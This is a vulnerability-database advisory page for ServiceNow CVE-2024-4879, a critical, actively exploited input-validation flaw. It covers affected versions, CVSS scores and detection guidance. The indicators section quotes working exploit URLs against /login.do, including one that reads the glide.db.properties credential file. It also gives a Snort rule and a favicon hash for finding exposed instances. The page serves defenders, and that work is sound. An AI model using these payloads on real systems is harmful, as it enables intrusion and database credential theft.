cbcvebase.
CVE-2024-4879
published 2024-07-10

CVE-2024-4879: ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-08-19
Exploited in the wild
EPSS
99.98%
100.0th percentile
ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

Affected

14 ranges
VendorProductVersion rangeFixed in
servicenownow_platform< Utah Patch 10 Hot Fix 3Utah Patch 10 Hot Fix 3
servicenownow_platform< Utah Patch 10a Hot Fix 2Utah Patch 10a Hot Fix 2
servicenownow_platform< Vancouver Patch 6 Hot Fix 2Vancouver Patch 6 Hot Fix 2
servicenownow_platform< Vancouver Patch 7 Hot Fix 3bVancouver Patch 7 Hot Fix 3b
servicenownow_platform< Vancouver Patch 8 Hot Fix 4Vancouver Patch 8 Hot Fix 4
servicenownow_platform< Vancouver Patch 9Vancouver Patch 9
servicenownow_platform< Vancouver Patch 10Vancouver Patch 10
servicenownow_platform< Washington DC Patch 1 Hot Fix 2bWashington DC Patch 1 Hot Fix 2b
servicenownow_platform< Washington DC Patch 2 Hot Fix 2Washington DC Patch 2 Hot Fix 2
servicenownow_platform< Washington DC Patch 3 Hot Fix 1Washington DC Patch 3 Hot Fix 1
servicenownow_platform< Washington DC Patch 4Washington DC Patch 4
servicenowservicenow
servicenowservicenow
servicenowservicenow

Detection & IOCsextracted from sources · hover to see the quote

url/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E
url/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/conf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E
url/login.do?jvar_page_title=gs.addErrorMessage(1337*1337);
path/login.do
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • POST-based exploitation also observed: look for POST requests to /login.do where the request body contains `jvar_page_title=` (hex-encoded as `jvar_page_title|3d|`) followed by javascript or style keywords, as matched by the Emerging Threats Snort rule (sid:2060409).
  • Second-stage payload attempts to read `/conf/glide.db.properties` via `Packages.java.io.File` and `SecurelyAccess` to exfiltrate database credentials. Monitor HTTP responses from /login.do for patterns matching `glide.db.*=`, `jdbc.*=`, or `database.*=`.
  • The ongoing exploitation utilizes a payload injection to check for a specific result in the server response, followed by a second-stage payload that checks the database contents, ultimately dumping user lists and account credentials (hashed or plaintext).
  • CVE-2024-4879 is actively chained with CVE-2024-5178 and CVE-2024-5217 for full database access. Detection logic should correlate exploitation attempts across all three CVEs on the same source IP.
  • Use Shodan favicon hash `1701804003` or FOFA `icon_hash=1701804003` to identify internet-exposed ServiceNow instances for asset inventory and attack surface monitoring.
  • ·ServiceNow's own investigation found no evidence that its hosted instances were impacted; the vendor states hosted instances received fixes on May 14, 2024, well before the July 10 public patch. Self-hosted and partner-managed instances are the primary risk surface.
  • ·The Nuclei template uses a single GET request with arithmetic canary (1337*1337=1787569) for detection; this may produce false negatives on patched instances that still reflect numeric strings in error messages for unrelated reasons. Confirm with the second-stage file-read payload before concluding exploitation.
  • ·The Emerging Threats Snort rule (sid:2060409) covers both CVE-2024-4879 and CVE-2024-5217 in a single signature and is scoped to plaintext (non-TLS) traffic only (`tls_state plaintext`). Encrypted ServiceNow traffic will not be inspected without TLS inspection in place.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.